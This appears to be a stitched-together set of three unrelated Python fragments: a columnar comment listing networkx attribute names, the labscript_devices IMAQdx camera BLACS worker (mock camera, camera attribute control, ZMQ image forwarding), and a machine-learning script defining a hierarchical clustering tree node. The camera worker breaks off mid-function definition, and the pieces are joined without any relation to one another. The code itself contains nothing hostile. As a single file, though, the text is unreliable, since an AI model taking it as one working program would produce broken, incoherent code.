# nx.NetworkXError nx.eigenvector nx.node_attribute_xy
# nx.NetworkXException nx.eigenvector_centrality nx.node_boundary
# nx.NetworkXNoCycle nx.eigenvector_centrality_numpy nx.node_clique_number
# nx.NetworkXNoPath nx.empty_graph nx.node_connected_component
# nx.NetworkXNotImplemented nx.enumerate_all_cliques nx.node_connectivity
# nx.NetworkXPointlessConcept nx.erdos_renyi_graph nx.node_degree_xy
# nx.NetworkXTreewidthBoundExceeded nx.estrada_index nx.node_disjoint_paths
# nx.NetworkXUnbounded nx.euler nx.node_expansion
# nx.NetworkXUnfeasible nx.eulerian_circuit nx.node_link
# nx.NodeNotFound nx.exception nx.node_link_data
# nx.NotATree nx.expanders nx.node_link_graph
# nx.OrderedDiGraph nx.expected_degree_graph nx.nodes
# nx.OrderedGraph nx.extended_barabasi_albert_graph nx.nodes_with_selfloops
# nx.OrderedMultiDiGraph nx.extrema_bounding nx.non_edges
# nx.OrderedMultiGraph nx.fast_could_be_isomorphic nx.non_neighbors
# nx.PowerIterationFailedConvergence nx.fast_gnp_random_graph nx.nonisomorphic_trees
# nx.absolute_import nx.faster_could_be_isomorphic nx.normalized_cut_size
# nx.adamic_adar_index nx.fiedler_vector nx.normalized_laplacian_matrix
# nx.add_cycle nx.filters nx.not_implemented_for
# nx.add_path nx.find_cliques nx.null_graph
# nx.add_star nx.find_cliques_recursive nx.number_attracting_components
# nx.adj_matrix nx.find_cores nx.number_connected_components
# nx.adjacency nx.find_cycle nx.number_of_cliques
# nx.adjacency_data nx.find_induced_nodes nx.number_of_edges
# nx.adjacency_graph nx.florentine_families_graph nx.number_of_isolates
# nx.adjacency_matrix nx.flow nx.number_of_nodes
# nx.adjacency_spectrum nx.flow_hierarchy nx.number_of_nonisomorphic_trees
# nx.adjlist nx.flow_matrix nx.number_of_selfloops
# nx.algebraic_connectivity nx.floyd_warshall nx.number_strongly_connected_components
# nx.algebraicconnectivity nx.floyd_warshall_numpy nx.number_weakly_connected_components
# nx.algorithms nx.floyd_warshall_predecessor_and_distance nx.numeric_assortativity_coefficient
# nx.all nx.freeze nx.numeric_mixing_matrix
# nx.all_neighbors nx.from_dict_of_dicts nx.nx
# nx.all_node_cuts nx.from_dict_of_lists nx.nx_agraph
# nx.all_pairs_bellman_ford_path nx.from_edgelist nx.nx_pydot
# nx.all_pairs_bellman_ford_path_length nx.from_graph6_bytes nx.nx_pylab
# nx.all_pairs_dijkstra nx.from_nested_tuple nx.nx_shp
# nx.all_pairs_dijkstra_path nx.from_numpy_array nx.nx_yaml
# nx.all_pairs_dijkstra_path_length nx.from_numpy_matrix nx.octahedral_graph
# nx.all_pairs_lowest_common_ancestor nx.from_pandas_adjacency nx.operators
# nx.all_pairs_node_connectivity nx.from_pandas_edgelist nx.optimal_edit_paths
# nx.all_pairs_shortest_path nx.from_prufer_sequence nx.optimize_edit_paths
# nx.all_pairs_shortest_path_length nx.from_scipy_sparse_matrix nx.optimize_graph_edit_distance
# nx.all_shortest_paths nx.from_sparse6_bytes nx.ordered
# nx.all_simple_paths nx.frucht_graph nx.out_degree_centrality
# nx.ancestors nx.fruchterman_reingold_layout nx.overall_reciprocity
# nx.antichains nx.full_rary_tree nx.pagerank
# nx.approximate_current_flow_betweenness_centrality nx.function nx.pagerank_alg
# nx.articulation_points nx.gaussian_random_partition_graph nx.pagerank_numpy
# nx.assortativity nx.general_random_intersection_graph nx.pagerank_scipy
# nx.astar nx.generalized_degree nx.pairs
# nx.astar_path nx.generate_adjlist nx.pajek
# nx.astar_path_length nx.generate_edgelist nx.pappus_graph
# nx.atlas nx.generate_gexf nx.parse_adjlist
# nx.attr_matrix nx.generate_gml nx.parse_edgelist
# nx.attr_sparse_matrix nx.generate_graphml nx.parse_gml
# nx.attracting nx.generate_multiline_adjlist nx.parse_graphml
# nx.attracting_component_subgraphs nx.generate_pajek nx.parse_leda
# nx.attracting_components nx.generators nx.parse_multiline_adjlist
# nx.attribute_assortativity_coefficient nx.generic nx.parse_pajek
# nx.attribute_mixing_dict nx.geographical_threshold_graph nx.partial_duplication_graph
# nx.attribute_mixing_matrix nx.geometric nx.path_graph
# nx.attrmatrix nx.get_edge_attributes nx.periphery
# nx.authority_matrix nx.get_node_attributes nx.petersen_graph
# nx.average_clustering nx.gexf nx.planted_partition_graph
# nx.average_degree_connectivity nx.global_efficiency nx.power
# nx.average_neighbor_degree nx.global_parameters nx.powerlaw_cluster_graph
# nx.average_node_connectivity nx.global_reaching_centrality nx.predecessor
# nx.average_shortest_path_length nx.gml nx.preferential_attachment
# nx.balanced_tree nx.gn_graph nx.prefix_tree
# nx.barabasi_albert_graph nx.gnc_graph nx.product
# nx.barbell_graph nx.gnm_random_graph nx.project
# nx.beamsearch nx.gnp_random_graph nx.projected_graph
# nx.bellman_ford_path nx.gnr_graph nx.quotient_graph
# nx.bellman_ford_path_length nx.goldberg_radzik nx.ra_index_soundarajan_hopcroft
# nx.bellman_ford_predecessor_and_distance nx.gomory_hu_tree nx.radius
# nx.betweenness nx.google_matrix nx.random_clustered
# nx.betweenness_centrality nx.gpickle nx.random_clustered_graph
# nx.betweenness_centrality_source nx.graph nx.random_degree_sequence_graph
# nx.betweenness_centrality_subset nx.graph6 nx.random_geometric_graph
# nx.betweenness_subset nx.graph_atlas nx.random_graphs
# nx.bfs_beam_edges nx.graph_atlas_g nx.random_k_out_graph
# nx.bfs_edges nx.graph_clique_number nx.random_kernel_graph
# nx.bfs_predecessors nx.graph_edit_distance nx.random_layout
# nx.bfs_successors nx.graph_number_of_cliques nx.random_lobster
# nx.bfs_tree nx.graphical nx.random_partition_graph
# nx.biconnected nx.graphmatrix nx.random_powerlaw_tree
# nx.biconnected_component_edges nx.graphml nx.random_powerlaw_tree_sequence
# nx.biconnected_component_subgraphs nx.graphviews nx.random_regular_graph
# nx.biconnected_components nx.greedy_color nx.random_shell_graph
# nx.bidirectional_dijkstra nx.grid_2d_graph nx.random_tree
# nx.bidirectional_shortest_path nx.grid_graph nx.reaching
# nx.binary nx.harmonic nx.read_adjlist
# nx.binomial_graph nx.harmonic_centrality nx.read_edgelist
# nx.bipartite nx.has_bridges nx.read_gexf
# nx.boundary nx.has_path nx.read_gml
# nx.boundary_expansion nx.havel_hakimi_graph nx.read_gpickle
# nx.breadth_first_search nx.heawood_graph nx.read_graph6
# nx.bridges nx.hexagonal_lattice_graph nx.read_graphml
# nx.bull_graph nx.hierarchy nx.read_leda
# nx.capacity_scaling nx.hits nx.read_multiline_adjlist
# nx.cartesian_product nx.hits_alg nx.read_pajek
# nx.caveman_graph nx.hits_numpy nx.read_shp
# nx.center nx.hits_scipy nx.read_sparse6
# nx.centrality nx.hoffman_singleton_graph nx.read_weighted_edgelist
# nx.chain_decomposition nx.house_graph nx.read_yaml
# nx.chains nx.house_x_graph nx.readwrite
# nx.chordal nx.hub_matrix nx.reciprocity
# nx.chordal_cycle_graph nx.hybrid nx.recursive_simple_cycles
# nx.chordal_graph_cliques nx.hypercube_graph nx.relabel
# nx.chordal_graph_treewidth nx.icosahedral_graph nx.relabel_gexf_graph
# nx.chvatal_graph nx.identified_nodes nx.relabel_nodes
# nx.circulant_graph nx.immediate_dominators nx.relaxed_caveman_graph
# nx.circular_ladder_graph nx.in_degree_centrality nx.release
# nx.circular_layout nx.incidence_matrix nx.reportviews
# nx.classes nx.induced_subgraph nx.rescale_layout
# nx.classic nx.info nx.resource_allocation_index
# nx.clique nx.information_centrality nx.restricted_view
# nx.cliques_containing_node nx.intersection nx.reverse
# nx.closeness nx.intersection_all nx.reverse_view
# nx.closeness_centrality nx.intersection_array nx.rich_club_coefficient
# nx.closeness_vitality nx.inverse_line_graph nx.richclub
# nx.cluster nx.is_aperiodic nx.ring_of_cliques
# nx.clustering nx.is_arborescence nx.rooted_product
# nx.cn_soundarajan_hopcroft nx.is_attracting_component nx.s_metric
# nx.coloring nx.is_biconnected nx.scale_free_graph
# nx.common_neighbors nx.is_bipartite nx.sedgewick_maze_graph
# nx.communicability nx.is_branching nx.selfloop_edges
# nx.communicability_alg nx.is_chordal nx.semiconnected
# nx.communicability_betweenness_centrality nx.is_connected nx.set_edge_attributes
# nx.communicability_exp nx.is_digraphical nx.set_node_attributes
# nx.community nx.is_directed nx.shell_layout
# nx.complement nx.is_directed_acyclic_graph nx.shortest_path
# nx.complete_bipartite_graph nx.is_distance_regular nx.shortest_path_length
# nx.complete_graph nx.is_dominating_set nx.shortest_paths
# nx.complete_multipartite_graph nx.is_edge_cover nx.shortest_simple_paths
# nx.components nx.is_empty nx.similarity
# nx.compose nx.is_eulerian nx.simple_cycles
# nx.compose_all nx.is_forest nx.simple_paths
# nx.condensation nx.is_frozen nx.single_source_bellman_ford
# nx.conductance nx.is_graphical nx.single_source_bellman_ford_path
# nx.configuration_model nx.is_isolate nx.single_source_bellman_ford_path_length
# nx.connected nx.is_isomorphic nx.single_source_dijkstra
# nx.connected_caveman_graph nx.is_k_edge_connected nx.single_source_dijkstra_path
# nx.connected_component_subgraphs nx.is_kl_connected nx.single_source_dijkstra_path_length
# nx.connected_components nx.is_matching nx.single_source_shortest_path
# nx.connected_double_edge_swap nx.is_maximal_matching nx.single_source_shortest_path_length
# nx.connected_watts_strogatz_graph nx.is_multigraphical nx.single_target_shortest_path
# nx.connectivity nx.is_negatively_weighted nx.single_target_shortest_path_length
# nx.constraint nx.is_pseudographical nx.small
# nx.contracted_edge nx.is_semiconnected nx.smetric
# nx.contracted_nodes nx.is_simple_path nx.social
# nx.convert nx.is_strongly_connected nx.soft_random_geometric_graph
# nx.convert_matrix nx.is_strongly_regular nx.sparse6
# nx.convert_node_labels_to_integers nx.is_tree nx.spectral_layout
# nx.core nx.is_valid_degree_sequence_erdos_gallai nx.spectral_ordering
# nx.core_number nx.is_valid_degree_sequence_havel_hakimi nx.spectrum
# nx.coreviews nx.is_valid_joint_degree nx.spring_layout
# nx.correlation nx.is_weakly_connected nx.square_clustering
# nx.cost_of_flow nx.is_weighted nx.star_graph
# nx.could_be_isomorphic nx.isolate nx.stochastic
# nx.covering nx.isolates nx.stochastic_graph
# nx.create_empty_copy nx.isomorphism nx.stoer_wagner
# nx.cubical_graph nx.jaccard_coefficient nx.strong_product
# nx.current_flow_betweenness nx.jit nx.strongly_connected
# nx.current_flow_betweenness_centrality nx.jit_data nx.strongly_connected_component_subgraphs
# nx.current_flow_betweenness_centrality_subset nx.jit_graph nx.strongly_connected_components
# nx.current_flow_betweenness_subset nx.johnson nx.strongly_connected_components_recursive
# nx.current_flow_closeness nx.join nx.structuralholes
# nx.current_flow_closeness_centrality nx.joint_degree_graph nx.subgraph
# nx.cut_size nx.joint_degree_seq nx.subgraph_alg
# nx.cuts nx.json_graph nx.subgraph_centrality
# nx.cycle_basis nx.k_components nx.subgraph_centrality_exp
# nx.cycle_graph nx.k_core nx.swap
# nx.cycles nx.k_corona nx.symmetric_difference
# nx.cytoscape nx.k_crust nx.tensor_product
# nx.cytoscape_data nx.k_edge_augmentation nx.test
# nx.cytoscape_graph nx.k_edge_components nx.tests
# nx.dag nx.k_edge_subgraphs nx.tetrahedral_graph
# nx.dag_longest_path nx.k_nearest_neighbors nx.thresholded_random_geometric_graph
# nx.dag_longest_path_length nx.k_random_intersection_graph nx.to_dict_of_dicts
# nx.dag_to_branching nx.k_shell nx.to_dict_of_lists
# nx.davis_southern_women_graph nx.kamada_kawai_layout nx.to_directed
# nx.degree nx.karate_club_graph nx.to_edgelist
# nx.degree_alg nx.katz nx.to_graph6_bytes
# nx.degree_assortativity_coefficient nx.katz_centrality nx.to_nested_tuple
# nx.degree_centrality nx.katz_centrality_numpy nx.to_networkx_graph
# nx.degree_histogram nx.kl_connected_subgraph nx.to_numpy_array
# nx.degree_mixing_dict nx.kosaraju_strongly_connected_components nx.to_numpy_matrix
# nx.degree_mixing_matrix nx.krackhardt_kite_graph nx.to_numpy_recarray
# nx.degree_pearson_correlation_coefficient nx.ladder_graph nx.to_pandas_adjacency
# nx.degree_seq nx.laplacian_matrix nx.to_pandas_edgelist
# nx.degree_sequence_tree nx.laplacian_spectrum nx.to_prufer_sequence
# nx.dense nx.laplacianmatrix nx.to_scipy_sparse_matrix
# nx.dense_gnm_random_graph nx.lattice nx.to_sparse6_bytes
# nx.density nx.layout nx.to_undirected
# nx.depth_first_search nx.leda nx.topological_sort
# nx.desargues_graph nx.lexicographic_product nx.tournament
# nx.descendants nx.lexicographical_topological_sort nx.transitive_closure
# nx.dfs_edges nx.linalg nx.transitive_reduction
# nx.dfs_labeled_edges nx.line nx.transitivity
# nx.dfs_postorder_nodes nx.line_graph nx.traversal
# nx.dfs_predecessors nx.link_analysis nx.tree
# nx.dfs_preorder_nodes nx.link_prediction nx.tree_all_pairs_lowest_common_ancestor
# nx.dfs_successors nx.load nx.tree_data
# nx.dfs_tree nx.load_centrality nx.tree_graph
# nx.diameter nx.local_bridges nx.trees
# nx.diamond_graph nx.local_constraint nx.triad_graph
# nx.difference nx.local_efficiency nx.triadic_census
# nx.digraph nx.local_reaching_centrality nx.triads
# nx.dijkstra_path nx.lollipop_graph nx.triangles
# nx.dijkstra_path_length nx.lowest_common_ancestor nx.triangular_lattice_graph
# nx.dijkstra_predecessor_and_distance nx.lowest_common_ancestors nx.trivial_graph
# nx.directed nx.make_clique_bipartite nx.truncated_cube_graph
# nx.directed_configuration_model nx.make_max_clique_graph nx.truncated_tetrahedron_graph
# nx.directed_havel_hakimi_graph nx.make_small_graph nx.turan_graph
# nx.directed_laplacian_matrix nx.margulis_gabber_galil_graph nx.tutte_graph
# nx.directed_modularity_matrix nx.matching nx.unary
# nx.disjoint_union nx.max_flow_min_cost nx.uniform_random_intersection_graph
# nx.disjoint_union_all nx.max_weight_matching nx.union
# nx.dispersion nx.maximal_independent_set nx.union_all
# nx.distance_measures nx.maximal_matching nx.unweighted
# | |
#####################################################################
# #
# /labscript_devices/IMAQdxCamera/blacs_workers.py #
# #
# Copyright 2019, Monash University and contributors #
# #
# This file is part of labscript_devices, in the labscript suite #
# (see http://labscriptsuite.org), and is licensed under the #
# Simplified BSD License. See the license.txt file in the root of #
# the project for the full license. #
# #
#####################################################################
# Original imaqdx_camera server by dt, with modifications by rpanderson and cbillington.
# Refactored as a BLACS worker by cbillington
import sys
from time import perf_counter
from blacs.tab_base_classes import Worker
import threading
import numpy as np
from labscript_utils import dedent
import labscript_utils.h5_lock
import h5py
import labscript_utils.properties
import zmq
from labscript_utils.ls_zprocess import Context
from labscript_utils.shared_drive import path_to_local
from labscript_utils.properties import set_attributes
# Don't import nv yet so as not to throw an error, allow worker to run as a dummy
# device, or for subclasses to import this module to inherit classes without requiring
# nivision
nv = None
def _monkeypatch_imaqdispose():
"""Monkeypatch a fix to a memory leak bug in pynivision. The pynivision project is
no longer active, so we can't contribute this fix upstream. In the long run,
hopefully someone (perhaps us) forks it so that bugs can be addressed in the
normal way"""
import nivision.core
import ctypes
_imaqDispose = nivision.core._imaqDispose
def imaqDispose(obj):
if getattr(obj, "_contents", None) is not None:
_imaqDispose(ctypes.byref(obj._contents))
obj._contents = None
if getattr(obj, "value", None) is not None:
_imaqDispose(obj)
obj.value = None
# This is the bugfix: pointers as raw ints were not being disposed:
if isinstance(obj, int):
_imaqDispose(obj)
nivision.core.imaqDispose = nv.imaqDispose = imaqDispose
class MockCamera(object):
"""Mock camera class that returns fake image data."""
def __init__(self):
print("Starting device worker as a mock device")
self.attributes = {}
def set_attributes(self, attributes):
self.attributes.update(attributes)
def get_attribute(self, name):
return self.attributes[name]
def get_attribute_names(self, visibility_level=None):
return list(self.attributes.keys())
def configure_acquisition(self, continuous=False, bufferCount=5):
pass
def grab(self):
return self.snap()
def grab_multiple(self, n_images, images, waitForNextBuffer=True):
print(f"Attempting to grab {n_images} (mock) images.")
for i in range(n_images):
images.append(self.grab())
print(f"Got (mock) image {i+1} of {n_images}.")
print(f"Got {len(images)} of {n_images} (mock) images.")
def snap(self):
N = 500
A = 500
x = np.linspace(-5, 5, 500)
y = x.reshape((N, 1))
clean_image = A * (1 - 0.5 * np.exp(-(x ** 2 + y ** 2)))
# Write text on the image that says "NOT REAL DATA"
from PIL import Image, ImageDraw, ImageFont
font = ImageFont.load_default()
canvas = Image.new('L', [N // 5, N // 5], (0,))
draw = ImageDraw.Draw(canvas)
draw.text((10, 20), "NOT REAL DATA", font=font, fill=1)
clean_image += 0.2 * A * np.asarray(canvas.resize((N, N)).rotate(20))
return np.random.poisson(clean_image)
def stop_acquisition(self):
pass
def abort_acquisition(self):
pass
def close(self):
pass
class IMAQdx_Camera(object):
def __init__(self, serial_number):
global nv
import nivision as nv
_monkeypatch_imaqdispose()
# Find the camera:
print("Finding camera...")
for cam in nv.IMAQdxEnumerateCameras(True):
if serial_number == (cam.SerialNumberHi << 32) + cam.SerialNumberLo:
self.camera = cam
break
else:
msg = f"No connected camera with serial number {serial_number:X} found"
raise Exception(msg)
# Connect to the camera:
print("Connecting to camera...")
self.imaqdx = nv.IMAQdxOpenCamera(
self.camera.InterfaceName, nv.IMAQdxCameraControlModeController
)
# Keep an img attribute so we don't have to create it every time
self.img = nv.imaqCreateImage(nv.IMAQ_IMAGE_U16)
self._abort_acquisition = False
def set_attributes(self, attr_dict):
for k, v in attr_dict.items():
self.set_attribute(k, v)
def set_attribute(self, name, value):
"""Set the value of the attribute of the given name to the given value"""
_value = value # Keep the original for the sake of the error message
if isinstance(_value, str):
_value = _value.encode('utf8')
try:
nv.IMAQdxSetAttribute(self.imaqdx, name.encode('utf8'), _value)
except Exception as e:
# Add some info to the exception:
msg = f"failed to set attribute {name} to {value}"
raise Exception(msg) from e
def get_attribute_names(self, visibility_level, writeable_only=True):
"""Return a list of all attribute names of readable attributes, for the given
visibility level. Optionally return only writeable attributes"""
visibilities = {
'simple': nv.IMAQdxAttributeVisibilitySimple,
'intermediate': nv.IMAQdxAttributeVisibilityIntermediate,
'advanced': nv.IMAQdxAttributeVisibilityAdvanced,
}
visibility_level = visibilities[visibility_level.lower()]
attributes = []
for a in nv.IMAQdxEnumerateAttributes2(self.imaqdx, b'', visibility_level):
if writeable_only and not a.Writable:
continue
if not a.Readable:
continue
attributes.append(a.Name.decode('utf8'))
return sorted(attributes)
def get_attribute(self, name):
"""Return current value of attribute of the given name"""
try:
value = nv.IMAQdxGetAttribute(self.imaqdx, name.encode('utf8'))
if isinstance(value, nv.core.IMAQdxEnumItem):
value = value.Name
if isinstance(value, bytes):
value = value.decode('utf8')
return value
except Exception as e:
# Add some info to the exception:
raise Exception(f"Failed to get attribute {name}") from e
def snap(self):
"""Acquire a single image and return it"""
nv.IMAQdxSnap(self.imaqdx, self.img)
return self._decode_image_data(self.img)
def configure_acquisition(self, continuous=True, bufferCount=5):
nv.IMAQdxConfigureAcquisition(
self.imaqdx, continuous=continuous, bufferCount=bufferCount
)
nv.IMAQdxStartAcquisition(self.imaqdx)
def grab(self, waitForNextBuffer=True):
nv.IMAQdxGrab(self.imaqdx, self.img, waitForNextBuffer=waitForNextBuffer)
return self._decode_image_data(self.img)
def grab_multiple(self, n_images, images, waitForNextBuffer=True):
print(f"Attempting to grab {n_images} images.")
for i in range(n_images):
while True:
if self._abort_acquisition:
print("Abort during acquisition.")
self._abort_acquisition = False
return
try:
images.append(self.grab(waitForNextBuffer))
print(f"Got image {i+1} of {n_images}.")
break
except nv.ImaqDxError as e:
if e.code == nv.IMAQdxErrorTimeout.value:
print('.', end='')
continue
raise
print(f"Got {len(images)} of {n_images} images.")
def stop_acquisition(self):
nv.IMAQdxStopAcquisition(self.imaqdx)
nv.IMAQdxUnconfigureAcquisition(self.imaqdx)
def abort_acquisition(self):
self._abort_acquisition = True
def _decode_image_data(self, img):
img_array = nv.imaqImageToArray(img)
img_array_shape = (img_array[2], img_array[1])
# bitdepth in bytes
bitdepth = len(img_array[0]) // (img_array[1] * img_array[2])
dtype = {1: np.uint8, 2: np.uint16, 4: np.uint32}[bitdepth]
data = np.frombuffer(img_array[0], dtype=dtype).reshape(img_array_shape)
return data.copy()
def close(self):
nv.IMAQdxCloseCamera(self.imaqdx)
class IMAQdxCameraWorker(Worker):
# Subclasses may override this if their interface class takes only the serial number
# as an instantiation argument, otherwise they may reimplement get_camera():
interface_class = IMAQdx_Camera
def init(self):
self.camera = self.get_camera()
print("Setting attributes...")
self.smart_cache = {}
self.set_attributes_smart(self.camera_attributes)
self.set_attributes_smart(self.manual_mode_camera_attributes)
print("Initialisation complete")
self.images = None
self.n_images = None
self.attributes_to_save = None
self.exposures = None
self.acquisition_thread = None
self.h5_filepath = None
self.stop_acquisition_timeout = None
self.exception_on_failed_shot = None
self.continuous_stop = threading.Event()
self.continuous_thread = None
self.continuous_dt = None
self.image_socket = Context().socket(zmq.REQ)
self.image_socket.connect(
f'tcp://{self.parent_host}:{self.image_receiver_port}'
)
def get_camera(self):
"""Return an instance of the camera interface class. Subclasses may override
this method to pass required arguments to their class if they require more
than just the serial number."""
if self.mock:
return MockCamera()
else:
return self.interface_class(self.serial_number)
def set_attributes_smart(self, attributes):
"""Call self.camera.set_attributes() to set the given attributes, only setting
those that differ from their value in, or are absent from self.smart_cache.
Update self.smart_cache with the newly-set values"""
uncached_attributes = {}
for name, value in attributes.items():
if name not in self.smart_cache or self.smart_cache[name] != value:
uncached_attributes[name] = value
self.smart_cache[name] = value
self.camera.set_attributes(uncached_attributes)
def get_attributes_as_dict(self, visibility_level):
"""Return a dict of the attributes of the camera for the given visibility
level"""
names = self.camera.get_attribute_names(visibility_level)
attributes_dict = {name: self.camera.get_attribute(name) for name in names}
return attributes_dict
def get_attributes_as_text(self, visibility_level):
"""Return a string representation of the attributes of the camera for
the given visibility level"""
attrs = self.get_attributes_as_dict(visibility_level)
# Format it nicely:
lines = [f' {repr(key)}: {repr(value)},' for key, value in attrs.items()]
dict_repr = '\n'.join(['{'] + lines + ['}'])
return self.device_name + '_camera_attributes = ' + dict_repr
def snap(self):
"""Acquire one frame in manual mode. Send it to the parent via
self.image_socket. Wait for a response from the parent."""
image = self.camera.snap()
self._send_image_to_parent(image)
def _send_image_to_parent(self, image):
"""Send the image to the GUI to display. This will block if the parent process
is lagging behind in displaying frames, in order to avoid a backlog."""
metadata = dict(dtype=str(image.dtype), shape=image.shape)
self.image_socket.send_json(metadata, zmq.SNDMORE)
self.image_socket.send(image, copy=False)
response = self.image_socket.recv()
assert response == b'ok', response
def continuous_loop(self, dt):
"""Acquire continuously in a loop, with minimum repetition interval dt"""
while True:
if dt is not None:
t = perf_counter()
image = self.camera.grab()
self._send_image_to_parent(image)
if dt is None:
timeout = 0
else:
timeout = t + dt - perf_counter()
if self.continuous_stop.wait(timeout):
self.continuous_stop.clear()
break
def start_continuous(self, dt):
"""Begin continuous acquisition in a thread with minimum repetition interval
dt"""
assert self.continuous_thread is None
self.camera.configure_acquisition()
self.continuous_thread = threading.Thread(
target=self.continuous_loop, args=(dt,), daemon=True
)
self.continuous_thread.start()
self.continuous_dt = dt
def stop_continuous(self, pause=False):
"""Stop the continuous acquisition thread"""
assert self.continuous_thread is not None
self.continuous_stop.set()
self.continuous_thread.join()
self.continuous_thread = None
self.camera.stop_acquisition()
# If we're just 'pausing', then do not clear self.continuous_dt. That way
# continuous acquisition can be resumed with the same interval by calling
# start(self.continuous_dt), without having to get the interval from the parent
# again, and the fact that self.continuous_dt is not None can be used to infer
# that continuous acquisiton is paused and should be resumed after a buffered
# run is complete:
if not pause:
self.continuous_dt = None
def transition_to_buffered(self, | |
# -*- coding: utf-8 -*-
"""
Created on Wed Nov 21 21:30:31 2018
@authors: <NAME> and <NAME>
"""
# sklearn library
from sklearn import datasets
from sklearn import decomposition
from sklearn.model_selection import StratifiedKFold
from sklearn.metrics import accuracy_score
from sklearn.preprocessing import OneHotEncoder
# here are all the classifiers
from sklearn.ensemble import AdaBoostClassifier
from sklearn.ensemble import BaggingClassifier
from sklearn.ensemble import ExtraTreesClassifier
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.linear_model import ElasticNet
from sklearn.linear_model import ElasticNetCV
from sklearn.linear_model import Lasso
from sklearn.linear_model import LassoCV
from sklearn.linear_model import LogisticRegression
from sklearn.linear_model import LogisticRegressionCV
from sklearn.linear_model import PassiveAggressiveClassifier
from sklearn.linear_model import RidgeClassifier
from sklearn.linear_model import RidgeClassifierCV
from sklearn.linear_model import SGDClassifier
from sklearn.svm import SVC
from sklearn.neural_network import MLPClassifier
from keras.applications.resnet50 import ResNet50
from keras.models import load_model
from keras import optimizers
from keras.models import Sequential
from keras.layers import Dropout, Flatten, Dense, Conv2D, MaxPooling2D, Activation
from keras.callbacks import EarlyStopping
#from keras_models import keras_cnn_model
from anytree import NodeMixin, RenderTree, LevelOrderIter, search
import networkx as nx
import sys
import os
import datetime
import numpy as np
import matplotlib.pyplot as plt
import copy
from scipy import stats
from scipy.spatial.distance import pdist, cdist, euclidean
import csv
import time
import seaborn as sns
from matplotlib.colors import ListedColormap
#from master.src.main_test import folderName
def retrieve_n_class_color_cubic(N):
'''
retrive color code for N given classes
Input: class number
Output: list of RGB color code
'''
# manualy encode the top 8 colors
# the order is intuitive to be used
color_list = [
(1, 0, 0),
(0, 1, 0),
(0, 0, 1),
(1, 1, 0),
(0, 1, 1),
(1, 0, 1),
(0, 0, 0),
(1, 1, 1)
]
# if N is larger than 8 iteratively generate more random colors
np.random.seed(1) # pre-define the seed for consistency
interval = 0.5
while len(color_list) < N:
the_list = []
iterator = np.arange(0, 1.0001, interval)
for i in iterator:
for j in iterator:
for k in iterator:
if (i, j, k) not in color_list:
the_list.append((i, j, k))
the_list = list(set(the_list))
np.random.shuffle(the_list)
color_list.extend(the_list)
interval = interval / 2.0
return color_list[:N]
options = {
'node_color': 'black',
'node_size': 100,
'width': 3,
}
def make_meshgrid(x, y, h=.02):
x_min, x_max = x.min() - 1, x.max() + 1
y_min, y_max = y.min() - 1, y.max() + 1
xx, yy = np.meshgrid(np.arange(x_min, x_max, h),
np.arange(y_min, y_max, h))
return xx, yy
def plot_contours(clf, xx, yy, **params):
Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])
Z = Z.reshape(xx.shape)
out = plt.contourf(xx, yy, Z, **params)
return out, Z
def evaluate_core(X_core, y_core, X, y, classifier, cname=None, SEED=0):
if cname == "SVC":
referenceClassifier = copy.deepcopy(classifier(random_state=SEED, probability=True))
else:
referenceClassifier = copy.deepcopy(classifier(random_state=SEED))
referenceClassifier.fit(X_core, y_core)
y_pred = referenceClassifier.predict(X)
fail_points = y.squeeze() != y_pred
X_err = X[fail_points]
accuracy = accuracy_score(y, y_pred)
return X_err, accuracy, referenceClassifier, fail_points, y_pred
class GhcoreNode(NodeMixin):
def __init__(self, node_id, child_id=None, parent=None, X=[], y=[], sample_indeces=[], child_indeces=[], w=None, T=None, etime=1, graph=nx.Graph()):
super().__init__()
self.node_id = node_id
self.child_id = child_id
self.parent = parent
self.X = X
self.y = y
self.sample_indeces = sample_indeces
self.child_indeces = child_indeces
self.w = w
self.T = T
self.etime = etime
self.graph = graph
self.heterogenity = 0
if parent is None and len(y) > 0:
self.heterogenity = np.sum(np.abs(self.X - self.w))
def display(self):
for pre, _, node in RenderTree(self):
treestr = u"%s%s" % (pre, node.node_id)
heterogenity = 0
if len(node.y) > 0:
heterogenity = np.max( np.unique(node.y, return_counts=True) ) / len(node.y)
print(treestr.ljust(8), 'n_samples: %d; heterogenity = %.2f' %(len(node.y), heterogenity), end='')
print('')
def set_w(self, w):
self.w = w
def set_T(self, T):
self.T = T
def set_up_child_indeces(self):
self.child_indeces = [-1 for i in range(0, len(self.y))]
def increment_elapsed_time(self):
self.etime = self.etime + 1
def update_child_id(self, child_node):
child_node.child_id = len(self.children)-1
def add_sample(self, sample, target, j, child):
assert sample.shape[0] == 1
if self != child.parent:
child.X = np.concatenate((child.X, sample))
child.y = np.concatenate((child.y, target))
self.child_indeces[j] = -2
child.sample_indeces.append(-1)
child.child_indeces.append(-1)
return 0
old_child_idx = self.child_indeces[j]
# print(child.child_id)
# print(child.sample_indeces)
# print(self.child_indeces)
# print(j)
if old_child_idx == -2: return -1
if old_child_idx != child.child_id:
if old_child_idx != -1:
old_child = self.children[old_child_idx]
sample_j = old_child.sample_indeces.index(j)
# print(old_child.X.shape)
old_child.X = np.delete(old_child.X, sample_j, axis=0)
old_child.y = np.delete(old_child.y, sample_j, axis=0)
old_child.sample_indeces.remove(j)
# print(old_child.X.shape)
if len(child.X) == 0:
child.X, child.y = sample, target
else:
child.X = np.concatenate((child.X, sample))
child.y = np.concatenate((child.y, target))
child.sample_indeces.append(j)
self.child_indeces[j] = child.child_id
# print(child.sample_indeces)
# print(self.child_indeces)
# print()
return 0
def soft_competitive_learning(self, epsilon, sample):
Delta = epsilon * (sample - self.w) / self.etime
self.w = self.w + Delta
# def soft_competitive_learning_2(self, epsilon_w, epsilon_n, sample, winner_1):
# Delta = epsilon_w * (sample - self.w) / self.etime
# self.w = self.w + Delta
def update_threshold(self, child_node):
neighbours_id = self.get_graph_neighbours(child_node)
neighbours = search.findall(self, filter_=lambda node: node.node_id in neighbours_id, maxlevel=2)
neighbours_W = np.array([node.w.squeeze() for node in neighbours])
distances = np.sum( (child_node.w - neighbours_W)**2 , 1)
if len(distances) > 1: average_distance = np.mean(distances)
else: average_distance = distances[0]
max_distance = np.max((self.T, average_distance))
if max_distance == None:
print(1)
child_node.set_T(max_distance)
return neighbours
def add_graph_node(self, node_id):
self.graph.add_node(node_id)
def add_graph_edge(self, winner_1, winner_2):
self.graph.add_edge(winner_1.node_id, winner_2.node_id, weight=0)
def update_graph_edge(self, winner_1, neighbour, age_max):
self.graph[winner_1.node_id][neighbour.node_id]['weight'] += 1
